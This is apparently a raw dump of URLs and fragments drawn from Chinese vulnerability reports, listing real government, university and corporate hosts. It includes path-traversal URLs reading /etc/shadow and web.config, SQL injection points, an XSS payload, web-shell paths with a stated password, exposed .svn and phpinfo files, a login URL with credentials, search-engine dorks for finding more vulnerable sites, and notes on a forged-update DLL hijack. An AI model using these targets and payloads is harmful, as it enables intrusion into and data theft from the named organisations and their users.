http://www.pabx.cn/chinese/Product.asp?BigClassName=%B3%CC%BF%D8%B5%E7%BB%B0%BD%BB%BB%BB%BB%FA http://jsxf.com.cn/Chinese/Product.asp?BigClassName=%B9%AB%C2%B7%B9%A4%B3%CC http://www.zhmachinery.com/Chinese/Product.asp?BigClassName=%CF%E3%D4%ED%C9%FA%B2%FA%C9%E8%B1%B8 http://www.goldcode.cn/chinese/Product.asp?BigClassName=%B5%E7%B6%AF%B3%B5%B5%A5%CF%F2%B7%C0%B5%C1%C6%F7 http://www.leige.com.cn/Chinese/NewsInfo.asp?Action=Co&id=126 http://www.zhongjinalu.com/chinese/NewsInfo.asp?Action=Co&id=95 http://www.yike.com.cn/chinese/NewsInfo.asp?Action=Co&id=107 http://www.get-extrusion.com/chinese/NewsInfo.asp?Action=Co&id=148 http://www.cuiquan.com/chinese/NewsInfo.asp?Action=Co&id=20 http://www.joinluck.com/Chinese/NewsInfo.asp?Action=Co&ID=105 http://www.toshiba-gtbs.com/Chinese/NewsInfo.asp?Action=Co&id=85 http://www.powerteck.com.cn/Chinese/NewsInfo.asp?Action=Co&id=102 http://yj183.com/mgjx/chinese/NewsInfo.asp?Action=Co&id=89 http://www.shzxyy.com/chinese/NewsInfo.asp?Action=Co&ID=129 http://www.chang-de.com/CN/NewsInfo.asp?Action=Co&id=117 http://www.zjxcxj.com/Chinese/NewsInfo.asp?Action=Co&id=95 http://www.hengtongchemical.com/chinese/NewsInfo.asp?Action=Co&id=674 http://www.simyi.com/chinese/newsinfo.asp?action=Co&id=134 http://www.cn-yule.com/chinese/NewsInfo.asp?Action=Co&id=100 http://www.tang-ju.com/chinese/NewsInfo.asp?Action=Co&id=96 http://www.z-hope.com/Chinese/NewsInfo.asp?Action=Co&ID=89 http://www.goldcode.cn/chinese/NewsInfo.asp?Action=Co&id=107 http://www.zhmachinery.com/Chinese/NewsInfo.asp?Action=Co&ID=145 http://www.greating-fortune.com/cn/NewsInfo.asp?Action=Co&id=83 http://www.tgbjs.com/Chinese/NewsInfo.asp?Action=Co&ID=91 http://cnxiongfeng.com/cn/NewsInfo.asp?Action=Co&ID=103 http://finance.qq.com/silver/ http://agent.telchina.org/login.action ftp://box.caiyun.com ftp://biansu.caiyun.com http://dag.cjlu.edu.cn/list_first.php?I=40&B=2&NI=464 http://jwc.cjlu.edu.cn:8080/phpinfo.php http://interlib.com.cn http://interlib.com.cn/tcsoft/web/information.do?actionCmd=view&id=213 http://interlib.com.cn http://interlib.com.cn/tcsoft/web/information.do?actionCmd=view&id=213 http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code http://u.mumayi.com/oauth/?m=Oauth&a=authorize https://sls.cdb.com.cn/ http://www.tfbpay.cn/tfbpay/index.php/pc/manager/products http://www.tfbpay.cn/mobilepay/admin/login/login.html http://xs.haierzmd.com/zclr1.asp?ID=51 http://xs.haierzmd.com/pic_qb.asp?tid=8 http://xs.haierzmd.com/ylm_xx_elmxx.asp?eid=3 http://xs.haierzmd.com/pic_pic.asp?tid=1&pid=18 http://www.jyw.gov.cn/web/download.file?file_name=/WEB-INF/web.xml http://www.jyw.gov.cn/web/download.file?file_name=../web/pages/browse/2_index.jsp https://wap.wuhan.wandamoviepark.com/ https://wap.wuhan.wandamoviepark.com/LogIn/BackPwd http://www.longwan.gov.cn/ http://218.206.93.16/login.action http://114.255.242.150/loginAction!login.action http://219.142.60.70:8080 http://219.142.60.77:8080 http://219.142.60.70:8080/download.action?filename=../../../../../../etc/shadow http://219.142.60.77:8080/download.action?filename=../../../../../../etc/shadow http://yuedu.baidu.com/ebook/59ee9b9b89eb172dec63b724 http://yuedu.baidu.com/ebook/59ee9b9b89eb172dec63b724?t=1418749898736#comment www.xxx.com/do.php?act=goods_list,POST中的参数checkbox存在注入,程序没有对checkbox过滤,造成了注入。 http://www.huaxiayixin.com/ www.xxx.com/do.php?act=edit_transport_template,POST中的参数$id http://124.115.212.26//ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://www.bjws.gov.cn//ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://bz.smesd.gov.cn//ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://wf.smesd.gov.cn/ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://www.lnsxnh.com/ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://www.fsfdc.com.cn//ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://www.hbsgjj.cn/ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://220.178.252.189:8085//ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://www.imeach.com/ http://220.231.193.78:8080/meachCRM//accusation2/index/-1 http://www.cloud511.com/case http://www.jylbx.com/getProductList.do?typeId=1210 http://www.smdyf.cn/getProductList.do?typeId=1064 http://www.sydyf.com/getProductList.do?typeId=114 http://test.hzyibai.com/getProductList.do?typeId=1296 http://test.gxjjls.com/getProductList.do?typeId=1714 http://www.hangzhoudrt.com/getProductList.do?typeId=1268 http://www.zjbtv.com/注册用户,然后在爆料中心上传,通过合成图片马,再用burp截包修改后缀名上传! http://zg.fj10010.com/ http://zg.fj10010.com//.svn/entries https://github.com/fanyeren/ruby_notes/blob/bae8d21f45facdcefad7787284c463797a792af3/im/prod/redis/config/monit.conf.erb http://mail.58.com http://personal.avira-update.com/update/idx/master.idx下载主索引文件,这个文件描述的是一个生成日期,伪造文件内容如下: http://personal.avira-update.com/update/idx/wks_avira13-win32-zhcn-pecl.idx下载第二个索引文件,这个文件描述的是一些产品相关的信息,包括产品信息包的文件路径,还有哈希值,伪造文件内容如下: http://personal.avira-update.com/update/idx/wks_avira-win32-zhcn-pecl.info.gz下载要升级的模块信息,伪造的文件内容如下: http://personal.avira-update.com/update/idx/vdf.info.gz下载另一个模块的描述信息,这个文件同样适用gzip压缩传输: http://personal.avira-update.com/update/../../msimg32.dll,这个文件下载后,就会发到我们计算好的相对路径中,未做数字签名校验,最终导致DLL劫持注入,执行攻击者代码的后果。 http://nmg.wo.com.cn/index.action http://nmg.wo.com.cn/bak.jsp encap:Ethernet AC:16:2D:7A:F7:6C addr:172.16.1.1 Bcast:172.16.1.127 Mask:255.255.255.128 ae16:2dff:fe7a:f76c/64 Scope:Link MTU:1500 packets:733598549 errors:3348 packets:1936298895 http://www.ehaier.com/bbs/robots.txt/1.php http://bbs.youzu.com/ http://210.75.220.140/login.jsp http://w3.hevttc.edu.cn/jxjyxy/shownews.asp?id=458 http://w3.hevttc.edu.cn/jxjyxy/admin/ http://www.myrepospace.com/cydia/***.php http://www.myrepospace.com/cydia/***.php?i=631433 http://eoffice8.weaver.cn:8028/wav/1.php,密码为pass http://61.163.107.26:8082/wav/1.php http://219.232.254.131:8082/wav/1.php http://122.224.149.30:8082/wav/1.php http://www.eduwind.com/release http://demo.eduwind.com/cms/article/index/cid/29 http://demo.eduwind.com/cms/people/index/cid/26 http://enterprise.zte.com.cn,提交重要信息变更(如个人账户信息修改)时缺少校验,存在CSRF漏洞。 http://wz.easou.com/gs.e?esid=U4xDHpoG85s&gsid=1631&gsname=%E4%B9%A6%E7%B1%8D&wver=t http://www.xplus.com/ www2.easou.com:8080 http://www2.easou.com:8080 cn:8088/manager/login!login2.do http://222.186.12.144:8888/ http://www.baidu.com/s?wd=http%3A%2F%2F222.186.12.144%3A8888%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=0&oq=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5&inputT=799&rsv_pq=85d5d28100007683&rsv_t=022cQ4rxhIN8l4PiN1qvrX3GHzbAFvPglZ9yczNixGk6kNE2iZFnRkaYpCLDsZ5Y%2F0SY&rsv_n=2&rsv_sug3=16&rsv_sug4=586&rsv_sug1=16&rsv_sug=1&bs=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5%E4%B8%AD%E5%BF%83 http://gxlyjt.com/index.php?gxlyjt=130&wap=1 http://www.cqwswsjds.com/index.php/Content/index/type/85.html?cqwswsjds=1661 http://www.cqkxajj.gov.cn/index.php/Content/index/type/209.html?gov=748 album.kuwo.cn/album/h/xinQingView?id=8 inurl:szxy/logon.action filetype:action http://www.zjxjzx.cn:8080/szxy/logon.action http://60.190.127.23:8181/szxy/logon.action http://www.lwhczx.com/szxy/logon.action http://www.nbchzx.com/szxy/logon.action http://www.scsyxx.net:8080/szxy/logon.action http://www.ra2z.cn:8181/szxy/logon.action http://202.119.83.28:8080/gallery/demo.txt http://220.178.252.189:8085//ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://124.115.212.26//ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://www.bjws.gov.cn//ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://www.dggjj.cn/ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://ecard.sjtu.edu.cn/indexmanagerLogin.action http://show.kuwo.cn/KuwoLive/Xphoto?ptype=0&uid=120563511 http://210.75.218.181/spba/pub/spectacleInfo.action http://118.186.217.53/nexus/ inurl:library.koolearn.com/user http://library.koolearn.com/online/library.jsp http://library.koolearn.com/online/library.jsp http://login.koolearn.com/sso/login.do?userName=klb_cumtb0118_cumtb20061229_000_library&password=77c41cfc2a4b60401867587a8a85a573&next_page= http://218.78.217.95:7001/defaultroot/GovSendFileAction.do?id=2&action=delete http://www.bjtgc.com.cn/icar/user/index-comp!getSpecBySpecId.action?specId=fecff38a-9bbc-4c33-88e7-093e54261faa http://babyxy.mm.56.com http://cicoo.mm.56.com http://clinre.mm.56.com http://ddgg6611.mm.56.com http://honey-tong.mm.56.com http://i86119210.mm.56.com http://ruru0629.mm.56.com http://smile0227.mm.56.com http://tu_ji.mm.56.com http://vivi945.mm.56.com http://woshimaoerbaobei.mm.56.com http://ws5213689.mm.56.com http://babyxy.mm.56.com/.svn/entries http://cicoo.mm.56.com/.svn/entries http://clinre.mm.56.com/.svn/entries http://ddgg6611.mm.56.com/.svn/entries http://honey-tong.mm.56.com/.svn/entries http://i86119210.mm.56.com/.svn/entries http://ruru0629.mm.56.com/.svn/entries http://smile0227.mm.56.com/.svn/entries http://tu_ji.mm.56.com/.svn/entries http://vivi945.mm.56.com/.svn/entries http://woshimaoerbaobei.mm.56.com/.svn/entries http://ws5213689.mm.56.com/.svn/entries http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/annex_manager.jsp http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/annex_file.jsp?url=/../ http://www.jxfdacdc.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://www.dtycgs.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://121.30.232.54:9080/ycportal/jsp/explorer/annex_file.jsp?url=/ http://sxlfyc.com/ycportal/jsp/explorer/annex_file.jsp?url=/ http://www.lvlyc.com.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://59.53.245.105/ycportal/jsp/explorer/annex_file.jsp?url=/ http://szycgs.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://192.168.4.70/a.php www.kuwo.cn/mingxing/%E5%87%A4%E5%87%B0%E4%BC%A0%E5%A5%87/pic_1.htm?subId=4 http://121.251.136.3:81/products_detail.asp?id=15 http://ehome.zte.com.cn:9009/index.php?app=search&cate_id=1 inurl:xwl.do?smid= http://123.130.246.26:9080/wscgs/xwl.do?smid=16&bgid=01&bj=8 http://60.211.179.22:9080/wscgs/xwl.do?smid=16&bgid=01&bj=8 http://www.lcwscgs.com/wscgs/xwl.do?bgid=04&smid=22&bj=8 http://58.59.39.43:9080/wscgs/xwl.do?smid=22&bgid=04&bj=8 http://221.2.145.164:9080/wscgs/xwl.do?bgid=07&smid=27&bj=8 http://cgs.qdpolice.gov.cn:9080/wscgs/xwl.do?smid=53&bgid=04&bj=8 http://www.bzwscgs.com:9080/wscgs/xwl.do?bgid=02&smid=18&bj=8 dynamic.help.xunlei.com/getArticlesBySearch.do?callback=jsonp1418799470192&searchstr=aaaa&_=1418799470273 http://www.dagexing.com/qq_qqOauthBack.do?code=D92DAFB5CBD1301544402A61F841BD08&state=3a2918360a82b35b6cd3a849e2c549ee http://www.dagexing.com/MemQQSinaManage_sendCaptcha.do www.dagexing.com http://www.dagexing.com http://wdcx.yundasys.com:11347/p3_system_web/login.jsp http://116.52.249.28:8080/axis2/axis2-admin http://116.52.249.28:8080/axis2/services/MobileServiceLocal?wsdl http://203.171.229.167:8080/ www.cnshuiyu.com http://121.30.226.44/login.asp http://124.65.69.14/login.asp http://vos.tjufe.edu.cn/login.asp http://211.68.250.42/login.asp http://www.fzsyxx.com/oa/ http://oa.ccib.com.cn/login.asp http://www.cnshuiyu.com/login.asp http://oa.tjfsu.edu.cn/login.asp http://old.mdjagri.gov.cn/oa/login.asp http://60.171.34.204:8086/ http://116.228.82.237/login.asp http://dfoa.shhjwl.com/login.asp http://www.cnshuiyu.com/login.asp http://211.68.192.21/login.asp http://121.30.226.44/login.asp http://180.166.7.94/login.asp http://cqkyoa.oicp.net/login.asp http://121.30.226.44/login.asp http://124.65.69.14 http://vos.tjufe.edu.cn http://211.68.250.42天津农学院 http://www.fzsyxx.com/ http://oa.ccib.com.cn/login.asp http://www.cnshuiyu.com/login.asp http://oa.tjfsu.edu.cn/login.asp http://old.mdjagri.gov.cn/oa/login.asp http://60.171.34.204:8086/ http://116.228.82.237/login.asp http://dfoa.shhjwl.com/login.asp http://www.cnshuiyu.com/login.asp http://211.68.192.21/login.asp http://121.30.226.44/login.asp http://180.166.7.94/login.asp http://cqkyoa.oicp.net/login.asp param:DepartList,OAID http://www.wayboo.cn/ http://www.xayfds.net/info.php?class=38 http://www.shfuhai.com/info.php?class=38 http://www.bdjyjx.com/info.php?class=38 http://www.pbdt360.com/info.php?class=38 http://www.lilongeps.cn/info.php?class=38 http://www.xhbzdc.com/wap/info.php?class=38 http://www.bjznxf.com/info.php?class=38 http://www.qiqiangjx.com/info.php?class=38 http://bibojsj.com/info.php?class=38 http://www.sxtongtu.com/info.php?class=38 http://www.zzpjjg.com/info.php?class=38 http://www.jndsmm.com/info.php?class=38 http://www.changchunyida.com/wap/info.php?class=38 http://www.lnsbhg.com/wap/info.php?class=38 http://www.xawhmc.com/info.php?class=38 http://sjzbangongjiaju.com/info.php?class=38 http://sjzbangongjiaju.com/info.php?class=38 http://www.xawhmc.com/info.php?class=38 http://itpx.haier.com/ http://hpm.haier.net/haiergc/Sys/SystemCtrlList.aspx http://pcp.povos.com.cn/download_detail.jsp?id=10058 https://tender.wanda.cn/ https://tender.wanda.cn/COST/DocumentLibrary/SEFileDownLoad.aspx?f=c:\IFCA_Software\web.config view-source:https://vendor.wanda.cn/tender/default.aspx inurl:eol/homepage/common/ http://*/eol/popups/jpkrecord/upload_file.jsp?courseId=* http://spks2.gzzk.cn/ http://s.haier.com/ s.haier.com/piwik/phpinfo.php http://s.haier.com/km100survey/faces/public/registers.jsp?from=%22--%3E%3CscRipt%3Ealert%28%27xxs%27%29%3C/scRipt%3E%3C!-- http://s.haier.com/km100survey/faces/public/makepassword.jsp?from= http://s.haier.com/km100survey/faces/public/registers.jsp?from= http://s.haier.com/upload/9bb5980b1f244881854fce4cb03514f6.php http://123.58.188.200/ inurl:/ProductView.aspx?did= http://www.yniso9001.com/ProductView.aspx?did=128 http://www.sqlmap.org www.yniso9 http://www.dagexing.com http://**.**.**/loginAction_login.do http://120.197.95.240:8080/login.action http://www.3g.net.cn/recruit/jobs/list/page/1?clear=1&type=0&rid=425 http://www.17u.net/login/reg_ok.asp?uid=228301 http://www.17u.net/login/reg_ok.asp?uid=1 http://www.17u.net/login/reg_ok.asp?uid=133 www.ncrm.org.cn http://www.zzcourt.gov.cn/admin/login.php android:authorities="com.lbe.security.phone android:enabled="true android:exported="true android:name="com.lbe.security.service.phone.provider.TelephonyProvider android:process=":service content://com.lbe.security.phone/blacklist content://com.lbe.security.phone/whitelist content://com.lbe.security.phone/keyword content://com.lbe.security.phone/marker content://com.lbe.security.phone/baselist content://com.lbe.security.phone/blocklog content://com.lbe.security.phone/ipwhitelist content://com.lbe.security.phone/yellow_page_cache content://com.lbe.security.phone/user_permit_number http://www.1039soft.com/ http://huiyuan.edu-pal.com/teacher/Index.aspx http://huiyuan.edu-pal.com/teacher/Index.aspx http://221.214.164.198:1039/Student/StudentLogin.aspx http://www.whaqjx.com/teacher/Index.aspx http://110.249.129.242/Teacher/Index.aspx http://219.145.135.190:88/teacher/Index.aspx http://222.223.229.50:8080/teacher/Index.aspx http://www.wepiao.com/?m=web&c=film&a=filmsrc&fid=1787 http://119.38.194.93/partner/downloadEpolicy.do?policyCode=6033187XXXXXXXX http://www.xaglkp.com/ inurl:/list.jsp http://www.sasacgs.gov.cn/detail.jsp?articleId=759 http://www.jcsxz.com/detail.jsp?articleId=450 http://www.gsjkjy.org.cn/detail.jsp?articleId=8895 http://www.qyszxxz.com/detail.jsp?articleId=150 http://www.lzfybj.cn/detail.jsp?articleId=912 http://www.365rrs.com/notice/noticeDetail?pk=8796945030977 inurl:e-learning/index.asp google:inurl:/xmlpzs/ysxkdetail.asp?permitsaleno= huangshanhouse.gov.cn/xmlpzs/ysxkdetail.asp www.lzfg.com.cn/.../xmlpzs/ysxkdetail.asp www.wnfdc.com/.../xmlpzs/ysxkdetail.asp www.xnfcxx.com/.../xmlpzs/ysxkdetail.asp cn:5661/.../xmlpzs/ysxkdetail.asp http://123.134.189.60:8013/default4.aspx?CountryName=雪野旅游区&level=0 http://218.56.40.229:8053/default4.aspx?CountryName=%e6%b0%b8%e5%ae%89%e8%b7%af%e8%a1%97%e9%81%93&level=2 http://218.58.124.131:8003/default4.aspx?CountryName=高新区&level=1 http://222.134.154.214:8001/default4.aspx?CountryName=南麻镇&level=2 http://222.135.109.70:8200/default4.aspx?CountryName=文登市&level=1 http://221.2.149.47:8200/default4.aspx?CountryName=%e8%8d%ab%e5%ad%90%e9%95%87&level=2 http://111.17.169.213:801/default4.aspx?CountryName=%e5%bc%a0%e5%ba%97%e5%8c%ba&level=0 http://jwh.tanljgzx.gov.cn/default4.aspx?CountryName=%e6%b3%b0%e5%ae%89%e5%b8%82&level=0 http://61.133.119.187:8091/default4.aspx?CountryName=%e9%ab%98%e6%8a%80%e5%8c%ba&level=1 www.bjsfdc.com.cn www.altfcw.com www.dffgj.com www.bejfcw.com www.tazzfdc.gov.cn/old/jig1.asp www.xyfg.gov.cn/jig1.asp www.lzfg.com.cn/jig1.asp http://www.dtfc.gov.cn/jig1.asp?owen1=%BB%FA%B9%B9%C9%E8%D6%C3 inurl:zhengc.asp?owen1= www.snfgj.cn/zhengc.asp?owen1=房地产法规 www.dtfc.gov.cn/zhengc.asp?owen1=市政府文件 www.bjsfdc.com.cn/zhengc.asp?owen1=政府文件 www.jzfdc.gov.cn/zhengc.asp?owen1=政府文件 www.xyfg.gov.cn/zhengc.asp?owen1=国家法律 lzfg.com.cn/zhengc.asp?owen1=物业管理法规 http://xxx/zhengc.asp?owen1=%B7%BF%B5%D8%B2%FA%B7%A8%B9%E6 parma:owen1 http://118.186.218.8/ inurl:about.asp?id= http://www.tzkbls.com/about.asp?id=4 http://hnygdjd.com/about.asp?id=5 http://www.tz2d.com/about.asp?id=3 http://www.sdjmjc.com/about.asp?id=2 http://www.tzliangnuo.com/about.asp?id=3 http://www.miyoutech.com/about.asp?id=7 http://www.zzsruifeng.com/about.asp?id=2 http://shengjiahe.cn/about.asp?id=4 http://www.sdlzkj.com/about.asp?id=8 http://www.cyzgmt.com/about.asp?id=13 http://www.ehaier.com/bbs.tar.gz inurl:/noteDetail.jsp www.sasacgs.gov.cn/noteDetail.jsp?articleId=103 www.gongan.ningbo.gov.cn/.../notedetail.jsp www.gsws.gov.cn/noteDetail.jsp?articleId=305 www.gsws.gov.cn/noteDetail.jsp?articleId=255 www.gszlyy.com/noteDetail.jsp?articleId=133 www.jbga.gov.cn/include/notedetail.jsp?id=498 hsga.haishu.gov.cn/hdzx/notedetail.jsp?id=237 http://202.100.85.100/noteDetail.jsp?articleId=107为例 http://202.100.85.100/noteDetail.jsp?articleId=107" -p www.gszlyy.com/noteDetail.jsp?articleId=133 http://202.100.85.100/noteDetail.jsp?articleId=107" -p inurl:VisaSerchInfo.asp?InterArea= inurl:zhaoshang.asp?bid= http://www.tangciliucao.cn/zhaoshang.asp?bid=22&sid=70 http://www.powerhg.com/zhaoshang.asp?bid=22&sid=70 http://www.pxtl.com/dj/zhaoshang.asp?bid=22&sid=70 http://www.jsszpc.com/zhaoshang.asp?bid=22&sid=70 http://www.china-saint.com/zhaoshang.asp?bid=22&sid=70 http://www.jsszpc.com/zhaoshang.asp?bid=22&sid=70 http://www.jindamuye.com/zhaoshang.asp?bid=22&sid=70 http://www.pxtl.com/dj/zhaoshang.asp?bid=22&sid=70 http://api.pg.hortorgames.com/player/recharge http://test.api.pg.hortorgames.com:8080/player/recharge http://test.api.pg.hortorgames.com/player/recharge https://180.153.139.91/woa/ http://180.153.139.84:11381/ydccp/login.jsp http://wdcx.yundasys.com:11347/p3_system_web/login.jsp http://wdcx.yundasys.com:81/jjjk/login.php http://nbsw.yundasys.com:11324/jgsz2011/login.php http://nbsw.yundasys.com:11324/gun/login_gh.php http://nbsw.yundasys.com:11324/ztb/jb_login.php http://nbsw.yundasys.com:11324/ztb/login.php http://youwu.jiemian.com/index.php?m=address&a=getEdit&id=342 http://my.ntu.edu.cn/ http://kf.youzu.com/ http://kf.youzu.com/online/chat/index/game_id/20 http://kf.uuzuonline.com/wy.php http://www2.easou.com:8080/views/login.action inurl:/NewsView.aspx?nid= inurl:/Product.aspx?nid= http://www.yniso9001.net/NewsView.aspx?nid=65 http://www.sqlmap.org www.yniso9 http://222.189.45.162/dzts/us_mima2.asp http://lsxnmxx.js.cn:41516/tushu/us_mima2.asp http://ts.gylyxx.com/us_mima2.asp http://221.181.233.195:10003/us_mima2.asp http://221.181.191.140/dzts/us_mima2.asp http://221.231.112.70:2001/syxdzts/us_mima2.asp http://tushu.dhxctzx.com/us_mima2.asp http://www.gyxjsxx.com/tushu/us_mima2.asp http://220.170.135.156:88/dzts//us_mima2.asp http://61.175.231.112:8090/dzts/us_mima2.asp http://61.175.231.112:8090/dzts/us_mima2.asp http://cip.tongfangpc.com.cn/cipweb/login.action http://i.hdu.edu.cn/ http://i.hdu.edu.cn/dcp/dcp/ http://i.hdu.edu.cn/dcp/upload_files/ http://i.hdu.edu.cn/dcp/upload_files/storage/ http://bq.sto.cn/Login.aspx http://my.ntu.edu.cn/ http://218.106.154.156 http://mail.shiep.edu.cn/sql/a.php页面内使用了var_dump函数泄露了root用户密码 http://mail.shiep.edu.cn/user/addrbook/import_cvs_log.txt http://t.cn/Rz3iGer http://www.wepiao.com/index.php?m=web&c=film&a=filmdetail&fid=1597 http://crm.airpp.com/crmtravel/userManagerAction!login.action http://203.192.12.73/Login!input.action http://www.asdht.com/ http://tuan.eduts.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.2760391.cn/help/pendantShow.aspx?stype=3&&cityid=@@version http://www.ndtuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://m.5izi.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://benear.net/help/pendantShow.aspx?stype=3&&cityid=@@version http://tg.mm315.cn/help/pendantShow.aspx?stype=3&&cityid=@@version http://www.pxtb.org/help/pendantShow.aspx?stype=3&&cityid=@@version http://jiaodatuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.mojing8.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version http://www.tongluowan.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.hk360buy.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://58.53.209.134/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.jetsoguide.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version http://www.mtuan365.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuangou.yongyao.net/help/pendantShow.aspx?stype=3&&cityid=@@version http://www.vlvyou.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://service.yhky.com/zjonline/getStation.do?regioncode=118001 http://my.xunyou.com/index.php/memberpanel/selectfindmethod http://gd.xunyou.com/upload/20141201/c4fd5b36eaadb6d5fa8a1b90412b390f.txt http://gd.xunyou.com/upload/20141201/a647df03fcdf0cae8fc37b15ade020d2.jpg http://cs.xunyou.com/index.php http://cs.xunyou.com/index.php/thread/addthread/1 http://cs.xunyou.com/upload/20141218/5428899/2f618a2649461253560d865ad59243b3.htm http://211.140.155.107/bak.jsp http://demo.htmdata.com/ashx/GetPage.ashx http://www.fudian-bank.com/www.fudian-bank.com.rar http://182.92.159.54/panel/login.php www.kfzx.gov.cn http://yun.fangdd.com/basic/user/my http://www.whwebsite.com/ inurl:About.aspx http://www.whhelmet.com/admin/index.aspx http://**.**.**/Product.aspxindex=300_ http://**.**.**/Product.aspxindex=5_ http://**.**.**/Product.aspxindex=23_ http://**.**.**/Product.aspxindex=15_ http://**.**.**/Product.aspxindex=39_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=1_ http://**.**.**/Product.aspxindex=12_ http://**.**.**/Product.aspxindex=27_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=9_ http://**.**.**/Product.aspxindex=11_ http://**.**.**/Product.aspxindex=2_ http://**.**.**/Product.aspxindex=19&Style=5_ http://**.**.**/Product.aspxindex=14_ http://**.**.**/Product.aspxindex=86&Style=1_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=21_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=87&Style=3_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=44&Style=19_ http://**.**.**/Product_Show.aspxindex=13_ http://**.**.**/Product_Show.aspxindex=166_ http://**.**.**/Product_show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=149_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=36_ http://**.**.**/Product_show.aspxindex=106_ http://**.**.**/Product_show.aspxindex=19_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=97_ http://**.**.**/Product_Show.aspxindex=121_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=280_ http://**.**.**/Product_Show.aspxindex=230_ http://**.**.**/Product_Show.aspxindex=61_ http://**.**.**/Product_Show.aspxindex=112_ http://**.**.**/Product_Show.aspxindex=961_ http://**.**.**/Product_show.aspxindex=125_ http://**.**.**/Product_show.aspxindex=28_ http://**.**.**/Product_Show.aspxindex=44_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=157_ http://**.**.**/Product_Show.aspxindex=118 http://www.frontcn.com/Product.aspx?index=300 http://www.jhsled.com/Product.aspx?index=5 http://www.whwebsite.com/ inurl:About.aspx http://www.whhelmet.com/admin/index.aspx http://**.**.**/Product.aspxindex=300_ http://**.**.**/Product.aspxindex=5_ http://**.**.**/Product.aspxindex=23_ http://**.**.**/Product.aspxindex=15_ http://**.**.**/Product.aspxindex=39_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=1_ http://**.**.**/Product.aspxindex=12_ http://**.**.**/Product.aspxindex=27_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=9_ http://**.**.**/Product.aspxindex=11_ http://**.**.**/Product.aspxindex=2_ http://**.**.**/Product.aspxindex=19&Style=5_ http://**.**.**/Product.aspxindex=14_ http://**.**.**/Product.aspxindex=86&Style=1_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=21_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=87&Style=3_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=44&Style=19_ http://**.**.**/Product_Show.aspxindex=13_ http://**.**.**/Product_Show.aspxindex=166_ http://**.**.**/Product_show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=149_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=36_ http://**.**.**/Product_show.aspxindex=106_ http://**.**.**/Product_show.aspxindex=19_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=97_ http://**.**.**/Product_Show.aspxindex=121_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=280_ http://**.**.**/Product_Show.aspxindex=230_ http://**.**.**/Product_Show.aspxindex=61_ http://**.**.**/Product_Show.aspxindex=112_ http://**.**.**/Product_Show.aspxindex=961_ http://**.**.**/Product_show.aspxindex=125_ http://**.**.**/Product_show.aspxindex=28_ http://**.**.**/Product_Show.aspxindex=44_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=157_ http://**.**.**/Product_Show.aspxindex=118 http://www.frontcn.com/Product.aspx?index=300 http://www.jhsled.com/Product.aspx?index=5 http://whlaobing.com/Product_Show.aspx?index=118 